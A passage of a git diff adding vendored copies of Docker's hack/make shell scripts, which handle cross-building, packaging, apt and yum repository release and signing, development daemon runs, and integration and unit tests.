"$DOCKER_ARCHIVE_DIR" +done + +echo +echo "$pool_dir now has contents:" +ls "$pool_dir" + +# now regenerate release files for experimental +export COMPONENT=experimental +source "${DIR}/update-apt-repo" + +echo "You will now want to: " +echo " - re-sign the repo with hack/make/sign-repo" +echo " - re-generate index files with hack/make/generate-index-listing" diff --git a/vendor/github.com/docker/docker/hack/make/clean-yum-repo b/vendor/github.com/docker/docker/hack/make/clean-yum-repo new file mode 100755 index 0000000000..1cafbbd97f --- /dev/null +++ b/vendor/github.com/docker/docker/hack/make/clean-yum-repo @@ -0,0 +1,20 @@ +#!/bin/bash +set -e + +# This script cleans the experimental pool for the yum repo. +# This is useful when there are a lot of old experimental rpms and you only want to keep the most recent. +# + +: ${DOCKER_RELEASE_DIR:=$DEST} +YUMDIR=$DOCKER_RELEASE_DIR/yum/repo/experimental + +suites=( $(find "$YUMDIR" -mindepth 1 -maxdepth 1 -type d) ) + +for suite in "${suites[@]}"; do + echo "cleanup in: $suite" + ( set -x; repomanage -k2 --old "$suite" | xargs rm -f ) +done + +echo "You will now want to: " +echo " - re-sign the repo with hack/make/sign-repo" +echo " - re-generate index files with hack/make/generate-index-listing" diff --git a/vendor/github.com/docker/docker/hack/make/cover b/vendor/github.com/docker/docker/hack/make/cover new file mode 100644 index 0000000000..08e28e3fea --- /dev/null +++ b/vendor/github.com/docker/docker/hack/make/cover @@ -0,0 +1,15 @@ +#!/bin/bash +set -e + +bundle_cover() { + coverprofiles=( "$DEST/../"*"/coverprofiles/"* ) + for p in "${coverprofiles[@]}"; do + echo + ( + set -x + go tool cover -func="$p" + ) + done +} + +bundle_cover 2>&1 | tee "$DEST/report.log" diff --git a/vendor/github.com/docker/docker/hack/make/cross b/vendor/github.com/docker/docker/hack/make/cross new file mode 100644 index 0000000000..6d672b17c3 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/make/cross @@ -0,0 +1,46 @@ +#!/bin/bash +set -e + +# explicit list of os/arch combos that support being a daemon +declare -A daemonSupporting +daemonSupporting=( + [linux/amd64]=1 + [windows/amd64]=1 +) + +# if we have our linux/amd64 version compiled, let's symlink it in +if [ -x "$DEST/../binary-daemon/dockerd-$VERSION" ]; then + arch=$(go env GOHOSTARCH) + mkdir -p "$DEST/linux/${arch}" + ( + cd "$DEST/linux/${arch}" + ln -s ../../../binary-daemon/* ./ + ln -s ../../../binary-client/* ./ + ) + echo "Created symlinks:" "$DEST/linux/${arch}/"* +fi + +for platform in $DOCKER_CROSSPLATFORMS; do + ( + export KEEPDEST=1 + export DEST="$DEST/$platform" # bundles/VERSION/cross/GOOS/GOARCH/docker-VERSION + mkdir -p "$DEST" + ABS_DEST="$(cd "$DEST" && pwd -P)" + export GOOS=${platform%/*} + export GOARCH=${platform##*/} + + if [ "$GOOS" != "solaris" ]; then + # TODO. Solaris cannot be cross build because of CGO calls. + if [ -z "${daemonSupporting[$platform]}" ]; then + # we just need a simple client for these platforms + export LDFLAGS_STATIC_DOCKER="" + # remove the "daemon" build tag from platforms that aren't supported + export BUILDFLAGS=( "${ORIG_BUILDFLAGS[@]/ daemon/}" ) + source "${MAKEDIR}/binary-client" + else + source "${MAKEDIR}/binary-client" + source "${MAKEDIR}/binary-daemon" + fi + fi + ) +done diff --git a/vendor/github.com/docker/docker/hack/make/dynbinary b/vendor/github.com/docker/docker/hack/make/dynbinary new file mode 100644 index 0000000000..1a435dc4bf --- /dev/null +++ b/vendor/github.com/docker/docker/hack/make/dynbinary @@ -0,0 +1,15 @@ +#!/bin/bash +set -e + +# This script exists as backwards compatibility for CI +( + DEST="${DEST}-client" + ABS_DEST="${ABS_DEST}-client" + . hack/make/dynbinary-client +) +( + + DEST="${DEST}-daemon" + ABS_DEST="${ABS_DEST}-daemon" + . hack/make/dynbinary-daemon +) diff --git a/vendor/github.com/docker/docker/hack/make/dynbinary-client b/vendor/github.com/docker/docker/hack/make/dynbinary-client new file mode 100644 index 0000000000..e4b7741848 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/make/dynbinary-client @@ -0,0 +1,12 @@ +#!/bin/bash +set -e + +( + export BINARY_SHORT_NAME='docker' + export GO_PACKAGE='github.com/docker/docker/cmd/docker' + export IAMSTATIC='false' + export LDFLAGS_STATIC_DOCKER='' + export BUILDFLAGS=( "${BUILDFLAGS[@]/netgo /}" ) # disable netgo, since we don't need it for a dynamic binary + export BUILDFLAGS=( "${BUILDFLAGS[@]/static_build /}" ) # we're not building a "static" binary here + source "${MAKEDIR}/.binary" +) diff --git a/vendor/github.com/docker/docker/hack/make/dynbinary-daemon b/vendor/github.com/docker/docker/hack/make/dynbinary-daemon new file mode 100644 index 0000000000..090a916f65 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/make/dynbinary-daemon @@ -0,0 +1,12 @@ +#!/bin/bash +set -e + +( + export BINARY_SHORT_NAME='dockerd' + export GO_PACKAGE='github.com/docker/docker/cmd/dockerd' + export IAMSTATIC='false' + export LDFLAGS_STATIC_DOCKER='' + export BUILDFLAGS=( "${BUILDFLAGS[@]/netgo /}" ) # disable netgo, since we don't need it for a dynamic binary + export BUILDFLAGS=( "${BUILDFLAGS[@]/static_build /}" ) # we're not building a "static" binary here + source "${MAKEDIR}/.binary" +) diff --git a/vendor/github.com/docker/docker/hack/make/generate-index-listing b/vendor/github.com/docker/docker/hack/make/generate-index-listing new file mode 100755 index 0000000000..ec44171f81 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/make/generate-index-listing @@ -0,0 +1,74 @@ +#!/bin/bash +set -e + +# This script generates index files for the directory structure +# of the apt and yum repos + +: ${DOCKER_RELEASE_DIR:=$DEST} +APTDIR=$DOCKER_RELEASE_DIR/apt +YUMDIR=$DOCKER_RELEASE_DIR/yum + +if [ ! -d $APTDIR ] && [ ! -d $YUMDIR ]; then + echo >&2 'release-rpm or release-deb must be run before generate-index-listing' + exit 1 +fi + +create_index() { + local directory=$1 + local original=$2 + local cleaned=${directory#$original} + + # the index file to create + local index_file="${directory}/index" + + # cd into dir & touch the index file + cd $directory + touch $index_file + + # print the html header + cat <<-EOF > "$index_file" + + + Index of ${cleaned}/ + +

Index of ${cleaned}/


+
../
+	EOF
+
+	# start of content output
+	(
+	# change IFS locally within subshell so the for loop saves line correctly to L var
+	IFS=$'\n';
+
+	# pretty sweet, will mimick the normal apache output. skipping "index" and hidden files
+	for L in $(find -L . -mount -depth -maxdepth 1 -type f ! -name 'index' ! -name '.*' -prune -printf "%f|@_@%Td-%Tb-%TY %Tk:%TM  @%f@\n"|sort|column -t -s '|' | sed 's,\([\ ]\+\)@_@,\1,g');
+	do
+		# file
+		F=$(sed -e 's,^.*@\([^@]\+\)@.*$,\1,g'<<<"$L");
+
+		# file with file size
+		F=$(du -bh $F | cut -f1);
+
+		# output with correct format
+		sed -e 's,\ @.*$, '"$F"',g'<<<"$L";
+	done;
+	) >> $index_file;
+
+	# now output a list of all directories in this dir (maxdepth 1) other than '.' outputting in a sorted manner exactly like apache
+	find -L . -mount -depth -maxdepth 1 -type d ! -name '.' -printf "%-43f@_@%Td-%Tb-%TY %Tk:%TM  -\n"|sort -d|sed 's,\([\ ]\+\)@_@,/\1,g' >> $index_file
+
+	# print the footer html
+	echo "

" >> $index_file + +} + +get_dirs() { + local directory=$1 + + for d in `find ${directory} -type d`; do + create_index $d $directory + done +} + +get_dirs $APTDIR +get_dirs $YUMDIR diff --git a/vendor/github.com/docker/docker/hack/make/install-binary b/vendor/github.com/docker/docker/hack/make/install-binary new file mode 100644 index 0000000000..82cbc79933 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/make/install-binary @@ -0,0 +1,12 @@ +#!/bin/bash + +set -e +rm -rf "$DEST" + +( + source "${MAKEDIR}/install-binary-client" +) + +( + source "${MAKEDIR}/install-binary-daemon" +) diff --git a/vendor/github.com/docker/docker/hack/make/install-binary-client b/vendor/github.com/docker/docker/hack/make/install-binary-client new file mode 100644 index 0000000000..6c80452659 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/make/install-binary-client @@ -0,0 +1,10 @@ +#!/bin/bash + +set -e +rm -rf "$DEST" + +( + DEST="$(dirname $DEST)/binary-client" + source "${MAKEDIR}/.binary-setup" + install_binary "${DEST}/${DOCKER_CLIENT_BINARY_NAME}" +) diff --git a/vendor/github.com/docker/docker/hack/make/install-binary-daemon b/vendor/github.com/docker/docker/hack/make/install-binary-daemon new file mode 100644 index 0000000000..08a2d69b96 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/make/install-binary-daemon @@ -0,0 +1,16 @@ +#!/bin/bash + +set -e +rm -rf "$DEST" + +( + DEST="$(dirname $DEST)/binary-daemon" + source "${MAKEDIR}/.binary-setup" + install_binary "${DEST}/${DOCKER_DAEMON_BINARY_NAME}" + install_binary "${DEST}/${DOCKER_RUNC_BINARY_NAME}" + install_binary "${DEST}/${DOCKER_CONTAINERD_BINARY_NAME}" + install_binary "${DEST}/${DOCKER_CONTAINERD_CTR_BINARY_NAME}" + install_binary "${DEST}/${DOCKER_CONTAINERD_SHIM_BINARY_NAME}" + install_binary "${DEST}/${DOCKER_PROXY_BINARY_NAME}" + install_binary "${DEST}/${DOCKER_INIT_BINARY_NAME}" +) diff --git a/vendor/github.com/docker/docker/hack/make/install-script b/vendor/github.com/docker/docker/hack/make/install-script new file mode 100644 index 0000000000..feadac2f38 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/make/install-script @@ -0,0 +1,63 @@ +#!/bin/bash +set -e + +# This script modifies the install.sh script for domains and keys other than +# those used by the primary opensource releases. +# +# You can provide `url`, `yum_url`, `apt_url` and optionally `gpg_fingerprint` +# or `GPG_KEYID` as environment variables, or the defaults for open source are used. +# +# The lower-case variables are substituted into install.sh. +# +# gpg_fingerprint and GPG_KEYID are optional, defaulting to the opensource release +# key ("releasedocker"). Other GPG_KEYIDs will require you to mount a volume with +# the correct contents to /root/.gnupg. +# +# It outputs the modified `install.sh` file to $DOCKER_RELEASE_DIR (default: $DEST) +# +# Example usage: +# +# docker run \ +# --rm \ +# --privileged \ +# -e "GPG_KEYID=deadbeef" \ +# -e "GNUPGHOME=/root/.gnupg" \ +# -v $HOME/.gnupg:/root/.gnupg \ +# -v $(pwd):/go/src/github.com/docker/docker/bundles \ +# "$IMAGE_DOCKER" \ +# hack/make.sh install-script + +: ${DOCKER_RELEASE_DIR:=$DEST} +: ${GPG_KEYID:=releasedocker} + +DEFAULT_URL="https://get.docker.com/" +DEFAULT_APT_URL="https://apt.dockerproject.org" +DEFAULT_YUM_URL="https://yum.dockerproject.org" +DEFAULT_GPG_FINGERPRINT="58118E89F3A912897C070ADBF76221572C52609D" + +: ${url:=$DEFAULT_URL} +: ${apt_url:=$DEFAULT_APT_URL} +: ${yum_url:=$DEFAULT_YUM_URL} +if [[ "$GPG_KEYID" == "releasedocker" ]] ; then + : ${gpg_fingerprint:=$DEFAULT_GPG_FINGERPRINT} +fi + +DEST_FILE="$DOCKER_RELEASE_DIR/install.sh" + +bundle_install_script() { + mkdir -p "$DOCKER_RELEASE_DIR" + + if [[ -z "$gpg_fingerprint" ]] ; then + # NOTE: if no key matching key is in /root/.gnupg, this will fail + gpg_fingerprint=$(gpg --with-fingerprint -k "$GPG_KEYID" | grep "Key fingerprint" | awk -F "=" '{print $2};' | tr -d ' ') + fi + + cp hack/install.sh "$DEST_FILE" + sed -i.bak 's#^url=".*"$#url="'"$url"'"#' "$DEST_FILE" + sed -i.bak 's#^apt_url=".*"$#apt_url="'"$apt_url"'"#' "$DEST_FILE" + sed -i.bak 's#^yum_url=".*"$#yum_url="'"$yum_url"'"#' "$DEST_FILE" + sed -i.bak 's#^gpg_fingerprint=".*"$#gpg_fingerprint="'"$gpg_fingerprint"'"#' "$DEST_FILE" + rm "${DEST_FILE}.bak" +} + +bundle_install_script diff --git a/vendor/github.com/docker/docker/hack/make/release-deb b/vendor/github.com/docker/docker/hack/make/release-deb new file mode 100755 index 0000000000..ed65fe2f5f --- /dev/null +++ b/vendor/github.com/docker/docker/hack/make/release-deb @@ -0,0 +1,163 @@ +#!/bin/bash +set -e + +# This script creates the apt repos for the .deb files generated by hack/make/build-deb +# +# The following can then be used as apt sources: +# deb http://apt.dockerproject.org/repo $distro-$release $version +# +# For example: +# deb http://apt.dockerproject.org/repo ubuntu-trusty main +# deb http://apt.dockerproject.org/repo ubuntu-trusty testing +# deb http://apt.dockerproject.org/repo debian-wheezy experimental +# deb http://apt.dockerproject.org/repo debian-jessie main +# +# ... and so on and so forth for the builds created by hack/make/build-deb + +: ${DOCKER_RELEASE_DIR:=$DEST} +: ${GPG_KEYID:=releasedocker} +APTDIR=$DOCKER_RELEASE_DIR/apt/repo + +# setup the apt repo (if it does not exist) +mkdir -p "$APTDIR/conf" "$APTDIR/db" "$APTDIR/dists" + +# supported arches/sections +arches=( amd64 i386 armhf ) + +# Preserve existing components but don't add any non-existing ones +for component in main testing experimental ; do + exists=$(find "$APTDIR/dists" -mindepth 2 -maxdepth 2 -type d -name "$component" -print -quit) + if [ -n "$exists" ] ; then + components+=( $component ) + fi +done + +# set the component for the version being released +component="main" + +if [[ "$VERSION" == *-rc* ]]; then + component="testing" +fi + +if [[ "$VERSION" == *-dev ]] || [ -n "$(git status --porcelain)" ]; then + component="experimental" +fi + +# Make sure our component is in the list of components +if [[ ! "${components[*]}" =~ $component ]] ; then + components+=( $component ) +fi + +# create apt-ftparchive file on every run. This is essential to avoid +# using stale versions of the config file that could cause unnecessary +# refreshing of bits for EOL-ed releases. +cat <<-EOF > "$APTDIR/conf/apt-ftparchive.conf" +Dir { + ArchiveDir "${APTDIR}"; + CacheDir "${APTDIR}/db"; +}; + +Default { + Packages::Compress ". gzip bzip2"; + Sources::Compress ". gzip bzip2"; + Contents::Compress ". gzip bzip2"; +}; + +TreeDefault { + BinCacheDB "packages-\$(SECTION)-\$(ARCH).db"; + Directory "pool/\$(SECTION)"; + Packages "\$(DIST)/\$(SECTION)/binary-\$(ARCH)/Packages"; + SrcDirectory "pool/\$(SECTION)"; + Sources "\$(DIST)/\$(SECTION)/source/Sources"; + Contents "\$(DIST)/\$(SECTION)/Contents-\$(ARCH)"; + FileList "$APTDIR/\$(DIST)/\$(SECTION)/filelist"; +}; +EOF + +for dir in bundles/$VERSION/build-deb/*/; do + version="$(basename "$dir")" + suite="${version//debootstrap-}" + + cat <<-EOF + Tree "dists/${suite}" { + Sections "${components[*]}"; + Architectures "${arches[*]}"; + } + + EOF +done >> "$APTDIR/conf/apt-ftparchive.conf" + +cat <<-EOF > "$APTDIR/conf/docker-engine-release.conf" +APT::FTPArchive::Release::Origin "Docker"; +APT::FTPArchive::Release::Components "${components[*]}"; +APT::FTPArchive::Release::Label "Docker APT Repository"; +APT::FTPArchive::Release::Architectures "${arches[*]}"; +EOF + +# release the debs +for dir in bundles/$VERSION/build-deb/*/; do + version="$(basename "$dir")" + codename="${version//debootstrap-}" + + tempdir="$(mktemp -d /tmp/tmp-docker-release-deb.XXXXXXXX)" + DEBFILE=( "$dir/docker-engine"*.deb ) + + # add the deb for each component for the distro version into the + # pool (if it is not there already) + mkdir -p "$APTDIR/pool/$component/d/docker-engine/" + for deb in ${DEBFILE[@]}; do + d=$(basename "$deb") + # We do not want to generate a new deb if it has already been + # copied into the APTDIR + if [ ! -f "$APTDIR/pool/$component/d/docker-engine/$d" ]; then + cp "$deb" "$tempdir/" + # if we have a $GPG_PASSPHRASE we may as well + # dpkg-sign before copying the deb into the pool + if [ ! -z "$GPG_PASSPHRASE" ]; then + dpkg-sig -g "--no-tty --digest-algo 'sha512' --passphrase '$GPG_PASSPHRASE'" \ + -k "$GPG_KEYID" --sign builder "$tempdir/$d" + fi + mv "$tempdir/$d" "$APTDIR/pool/$component/d/docker-engine/" + fi + done + + rm -rf "$tempdir" + + # build the right directory structure, needed for apt-ftparchive + for arch in "${arches[@]}"; do + for c in "${components[@]}"; do + mkdir -p "$APTDIR/dists/$codename/$c/binary-$arch" + done + done + + # update the filelist for this codename/component + find "$APTDIR/pool/$component" \ + -name *~${codename}*.deb -o \ + -name *~${codename#*-}*.deb > "$APTDIR/dists/$codename/$component/filelist" +done + +# run the apt-ftparchive commands so we can have pinning +apt-ftparchive generate "$APTDIR/conf/apt-ftparchive.conf" + +for dir in bundles/$VERSION/build-deb/*/; do + version="$(basename "$dir")" + codename="${version//debootstrap-}" + + apt-ftparchive \ + -c "$APTDIR/conf/docker-engine-release.conf" \ + -o "APT::FTPArchive::Release::Codename=$codename" \ + -o "APT::FTPArchive::Release::Suite=$codename" \ + release \ + "$APTDIR/dists/$codename" > "$APTDIR/dists/$codename/Release" + + for arch in "${arches[@]}"; do + apt-ftparchive \ + -c "$APTDIR/conf/docker-engine-release.conf" \ + -o "APT::FTPArchive::Release::Codename=$codename" \ + -o "APT::FTPArchive::Release::Suite=$codename" \ + -o "APT::FTPArchive::Release::Components=$component" \ + -o "APT::FTPArchive::Release::Architecture=$arch" \ + release \ + "$APTDIR/dists/$codename/$component/binary-$arch" > "$APTDIR/dists/$codename/$component/binary-$arch/Release" + done +done diff --git a/vendor/github.com/docker/docker/hack/make/release-rpm b/vendor/github.com/docker/docker/hack/make/release-rpm new file mode 100755 index 0000000000..d7e3ec4f8a --- /dev/null +++ b/vendor/github.com/docker/docker/hack/make/release-rpm @@ -0,0 +1,71 @@ +#!/bin/bash +set -e + +# This script creates the yum repos for the .rpm files generated by hack/make/build-rpm +# +# The following can then be used as a yum repo: +# http://yum.dockerproject.org/repo/$release/$distro/$distro-version +# +# For example: +# http://yum.dockerproject.org/repo/main/fedora/23 +# http://yum.dockerproject.org/repo/testing/centos/7 +# http://yum.dockerproject.org/repo/experimental/fedora/23 +# http://yum.dockerproject.org/repo/main/centos/7 +# +# ... and so on and so forth for the builds created by hack/make/build-rpm + +: ${DOCKER_RELEASE_DIR:=$DEST} +YUMDIR=$DOCKER_RELEASE_DIR/yum/repo +: ${GPG_KEYID:=releasedocker} + +# get the release +release="main" + +if [[ "$VERSION" == *-rc* ]]; then + release="testing" +fi + +if [[ "$VERSION" == *-dev ]] || [ -n "$(git status --porcelain)" ]; then + release="experimental" +fi + +# Setup the yum repo +for dir in bundles/$VERSION/build-rpm/*/; do + version="$(basename "$dir")" + suite="${version##*-}" + distro="${version%-*}" + + REPO=$YUMDIR/$release/$distro + + # if the directory does not exist, initialize the yum repo + if [[ ! -d $REPO/$suite/Packages ]]; then + mkdir -p "$REPO/$suite/Packages" + + createrepo --pretty "$REPO/$suite" + fi + + # path to rpms + RPMFILE=( "bundles/$VERSION/build-rpm/$version/RPMS/"*"/docker-engine"*.rpm "bundles/$VERSION/build-rpm/$version/SRPMS/docker-engine"*.rpm ) + + # if we have a $GPG_PASSPHRASE we may as well + # sign the rpms before adding to repo + if [ ! -z $GPG_PASSPHRASE ]; then + # export our key to rpm import + gpg --armor --export "$GPG_KEYID" > /tmp/gpg + rpm --import /tmp/gpg + + # sign the rpms + echo "yes" | setsid rpm \ + --define "_gpg_name $GPG_KEYID" \ + --define "_signature gpg" \ + --define "__gpg_check_password_cmd /bin/true" \ + --define "__gpg_sign_cmd %{__gpg} gpg --batch --no-armor --digest-algo 'sha512' --passphrase '$GPG_PASSPHRASE' --no-secmem-warning -u '%{_gpg_name}' --sign --detach-sign --output %{__signature_filename} %{__plaintext_filename}" \ + --resign "${RPMFILE[@]}" + fi + + # copy the rpms to the packages folder + cp "${RPMFILE[@]}" "$REPO/$suite/Packages" + + # update the repo + createrepo --pretty --update "$REPO/$suite" +done diff --git a/vendor/github.com/docker/docker/hack/make/run b/vendor/github.com/docker/docker/hack/make/run new file mode 100644 index 0000000000..37cfd53b5f --- /dev/null +++ b/vendor/github.com/docker/docker/hack/make/run @@ -0,0 +1,44 @@ +#!/bin/bash + +set -e +rm -rf "$DEST" + +if ! command -v dockerd &> /dev/null; then + echo >&2 'error: binary-daemon or dynbinary-daemon must be run before run' + false +fi + +DOCKER_GRAPHDRIVER=${DOCKER_GRAPHDRIVER:-vfs} +DOCKER_USERLANDPROXY=${DOCKER_USERLANDPROXY:-true} + +# example usage: DOCKER_STORAGE_OPTS="dm.basesize=20G,dm.loopdatasize=200G" +storage_params="" +if [ -n "$DOCKER_STORAGE_OPTS" ]; then + IFS=',' + for i in ${DOCKER_STORAGE_OPTS}; do + storage_params="--storage-opt $i $storage_params" + done + unset IFS +fi + + +listen_port=2375 +if [ -n "$DOCKER_PORT" ]; then + IFS=':' read -r -a ports <<< "$DOCKER_PORT" + listen_port="${ports[-1]}" +fi + +extra_params="" +if [ "$DOCKER_REMAP_ROOT" ]; then + extra_params="--userns-remap $DOCKER_REMAP_ROOT" +fi + +args="--debug \ + --host tcp://0.0.0.0:${listen_port} --host unix:///var/run/docker.sock \ + --storage-driver "$DOCKER_GRAPHDRIVER" \ + --userland-proxy="$DOCKER_USERLANDPROXY" \ + $storage_params \ + $extra_params" + +echo dockerd $args +exec dockerd $args diff --git a/vendor/github.com/docker/docker/hack/make/sign-repos b/vendor/github.com/docker/docker/hack/make/sign-repos new file mode 100755 index 0000000000..6ed1606885 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/make/sign-repos @@ -0,0 +1,65 @@ +#!/bin/bash + +# This script signs the deliverables from release-deb and release-rpm +# with a designated GPG key. + +: ${DOCKER_RELEASE_DIR:=$DEST} +: ${GPG_KEYID:=releasedocker} +APTDIR=$DOCKER_RELEASE_DIR/apt/repo +YUMDIR=$DOCKER_RELEASE_DIR/yum/repo + +if [ -z "$GPG_PASSPHRASE" ]; then + echo >&2 'you need to set GPG_PASSPHRASE in order to sign artifacts' + exit 1 +fi + +if [ ! -d $APTDIR ] && [ ! -d $YUMDIR ]; then + echo >&2 'release-rpm or release-deb must be run before sign-repos' + exit 1 +fi + +sign_packages(){ + # sign apt repo metadata + if [ -d $APTDIR ]; then + # create file with public key + gpg --armor --export "$GPG_KEYID" > "$DOCKER_RELEASE_DIR/apt/gpg" + + # sign the repo metadata + for F in $(find $APTDIR -name Release); do + if test "$F" -nt "$F.gpg" ; then + gpg -u "$GPG_KEYID" --passphrase "$GPG_PASSPHRASE" \ + --digest-algo "sha512" \ + --armor --sign --detach-sign \ + --batch --yes \ + --output "$F.gpg" "$F" + fi + inRelease="$(dirname "$F")/InRelease" + if test "$F" -nt "$inRelease" ; then + gpg -u "$GPG_KEYID" --passphrase "$GPG_PASSPHRASE" \ + --digest-algo "sha512" \ + --clearsign \ + --batch --yes \ + --output "$inRelease" "$F" + fi + done + fi + + # sign yum repo metadata + if [ -d $YUMDIR ]; then + # create file with public key + gpg --armor --export "$GPG_KEYID" > "$DOCKER_RELEASE_DIR/yum/gpg" + + # sign the repo metadata + for F in $(find $YUMDIR -name repomd.xml); do + if test "$F" -nt "$F.asc" ; then + gpg -u "$GPG_KEYID" --passphrase "$GPG_PASSPHRASE" \ + --digest-algo "sha512" \ + --armor --sign --detach-sign \ + --batch --yes \ + --output "$F.asc" "$F" + fi + done + fi +} + +sign_packages diff --git a/vendor/github.com/docker/docker/hack/make/test-deb-install b/vendor/github.com/docker/docker/hack/make/test-deb-install new file mode 100755 index 0000000000..aec5847600 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/make/test-deb-install @@ -0,0 +1,71 @@ +#!/bin/bash +# This script is used for testing install.sh and that it works for +# each of component of our apt and yum repos +set -e + +: ${DEB_DIR:="$(pwd)/bundles/$(cat VERSION)/build-deb"} + +if [[ ! -d "${DEB_DIR}" ]]; then + echo "you must first run `make deb` or hack/make/build-deb" + exit 1 +fi + +test_deb_install(){ + # test for each Dockerfile in contrib/builder + + builderDir="contrib/builder/deb/${PACKAGE_ARCH}" + pkgs=( $(find "${builderDir}/"*/ -type d) ) + if [ ! -z "$DOCKER_BUILD_PKGS" ]; then + pkgs=() + for p in $DOCKER_BUILD_PKGS; do + pkgs+=( "$builderDir/$p" ) + done + fi + for dir in "${pkgs[@]}"; do + [ -d "$dir" ] || { echo >&2 "skipping nonexistent $dir"; continue; } + local from="$(awk 'toupper($1) == "FROM" { print $2; exit }' "$dir/Dockerfile")" + local dir=$(basename "$dir") + + if [[ ! -d "${DEB_DIR}/${dir}" ]]; then + echo "No deb found for ${dir}" + exit 1 + fi + + local script=$(mktemp /tmp/install-XXXXXXXXXX.sh) + cat <<-EOF > "${script}" + #!/bin/bash + set -e + set -x + + apt-get update && apt-get install -y apparmor + + dpkg -i /root/debs/*.deb || true + + apt-get install -yf + + /etc/init.d/apparmor start + + # this will do everything _except_ load the profile into the kernel + ( + cd /etc/apparmor.d + /sbin/apparmor_parser --skip-kernel-load docker-engine + ) + EOF + + chmod +x "${script}" + + echo "testing deb install for ${from}" + docker run --rm -i --privileged \ + -v ${DEB_DIR}/${dir}:/root/debs \ + -v ${script}:/install.sh \ + ${from} /install.sh + + rm -f ${script} + done +} + +( + bundle .integration-daemon-start + test_deb_install + bundle .integration-daemon-stop +) 2>&1 | tee -a "$DEST/test.log" diff --git a/vendor/github.com/docker/docker/hack/make/test-docker-py b/vendor/github.com/docker/docker/hack/make/test-docker-py new file mode 100644 index 0000000000..fcacc16436 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/make/test-docker-py @@ -0,0 +1,20 @@ +#!/bin/bash +set -e + +source hack/make/.integration-test-helpers + +# subshell so that we can export PATH without breaking other things +( + bundle .integration-daemon-start + + dockerPy='/docker-py' + [ -d "$dockerPy" ] || { + dockerPy="$DEST/docker-py" + git clone https://github.com/docker/docker-py.git "$dockerPy" + } + + # exporting PYTHONPATH to import "docker" from our local docker-py + test_env PYTHONPATH="$dockerPy" py.test --junitxml="$DEST/results.xml" "$dockerPy/tests/integration" + + bundle .integration-daemon-stop +) 2>&1 | tee -a "$DEST/test.log" diff --git a/vendor/github.com/docker/docker/hack/make/test-install-script b/vendor/github.com/docker/docker/hack/make/test-install-script new file mode 100755 index 0000000000..4782cbea88 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/make/test-install-script @@ -0,0 +1,31 @@ +#!/bin/bash +# This script is used for testing install.sh and that it works for +# each of component of our apt and yum repos +set -e + +test_install_script(){ + # these are equivalent to main, testing, experimental components + # in the repos, but its the url that will do the conversion + components=( experimental test get ) + + for component in "${components[@]}"; do + # change url to specific component for testing + local test_url=https://${component}.docker.com + local script=$(mktemp /tmp/install-XXXXXXXXXX.sh) + sed "s,url='https://get.docker.com/',url='${test_url}/'," hack/install.sh > "${script}" + + chmod +x "${script}" + + # test for each Dockerfile in contrib/builder + for dir in contrib/builder/*/*/; do + local from="$(awk 'toupper($1) == "FROM" { print $2; exit }' "$dir/Dockerfile")" + + echo "running install.sh for ${component} with ${from}" + docker run --rm -i -v ${script}:/install.sh ${from} /install.sh + done + + rm -f ${script} + done +} + +test_install_script diff --git a/vendor/github.com/docker/docker/hack/make/test-integration-cli b/vendor/github.com/docker/docker/hack/make/test-integration-cli new file mode 100755 index 0000000000..689a5285f3 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/make/test-integration-cli @@ -0,0 +1,28 @@ +#!/bin/bash +set -e + +source hack/make/.integration-test-helpers + +# subshell so that we can export PATH without breaking other things +( + bundle .integration-daemon-start + + bundle .integration-daemon-setup + + bundle_test_integration_cli + + bundle .integration-daemon-stop + + if [ "$(go env GOOS)" != 'windows' ] + then + leftovers=$(ps -ax -o pid,cmd | awk '$2 == "docker-containerd-shim" && $4 ~ /.*\/bundles\/.*\/test-integration-cli/ { print $1 }') + if [ -n "$leftovers" ] + then + ps aux + kill -9 $leftovers 2> /dev/null + echo "!!!! WARNING you have left over shim(s), Cleanup your test !!!!" + exit 1 + fi + fi + +) 2>&1 | tee -a "$DEST/test.log" diff --git a/vendor/github.com/docker/docker/hack/make/test-integration-shell b/vendor/github.com/docker/docker/hack/make/test-integration-shell new file mode 100644 index 0000000000..86df9654a3 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/make/test-integration-shell @@ -0,0 +1,7 @@ +#!/bin/bash + +bundle .integration-daemon-start +bundle .integration-daemon-setup + +export ABS_DEST +bash +e diff --git a/vendor/github.com/docker/docker/hack/make/test-old-apt-repo b/vendor/github.com/docker/docker/hack/make/test-old-apt-repo new file mode 100755 index 0000000000..bb20128e30 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/make/test-old-apt-repo @@ -0,0 +1,29 @@ +#!/bin/bash +set -e + +versions=( 1.3.3 1.4.1 1.5.0 1.6.2 ) + +install() { + local version=$1 + local tmpdir=$(mktemp -d /tmp/XXXXXXXXXX) + local dockerfile="${tmpdir}/Dockerfile" + cat <<-EOF > "$dockerfile" + FROM debian:jessie + ENV VERSION ${version} + RUN apt-get update && apt-get install -y \ + apt-transport-https \ + ca-certificates \ + --no-install-recommends + RUN echo "deb https://get.docker.com/ubuntu docker main" > /etc/apt/sources.list.d/docker.list + RUN apt-key adv --keyserver hkp://keyserver.ubuntu.com:80 \ + --recv-keys 36A1D7869245C8950F966E92D8576A8BA88D21E9 + RUN apt-get update && apt-get install -y \ + lxc-docker-\${VERSION} + EOF + + docker build --rm --force-rm --no-cache -t docker-old-repo:${version} -f $dockerfile $tmpdir +} + +for v in "${versions[@]}"; do + install "$v" +done diff --git a/vendor/github.com/docker/docker/hack/make/test-unit b/vendor/github.com/docker/docker/hack/make/test-unit new file mode 100644 index 0000000000..f263345ce6 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/make/test-unit @@ -0,0 +1,55 @@ +#!/bin/bash +set -e + +# Run Docker's test suite, including sub-packages, and store their output as a bundle +# If $TESTFLAGS is set in the environment, it is passed as extra arguments to 'go test'. +# You can use this to select certain tests to run, e.g. +# +# TESTFLAGS='-test.run ^TestBuild$' ./hack/make.sh test-unit +# +bundle_test_unit() { + TESTFLAGS+=" -test.timeout=${TIMEOUT}" + 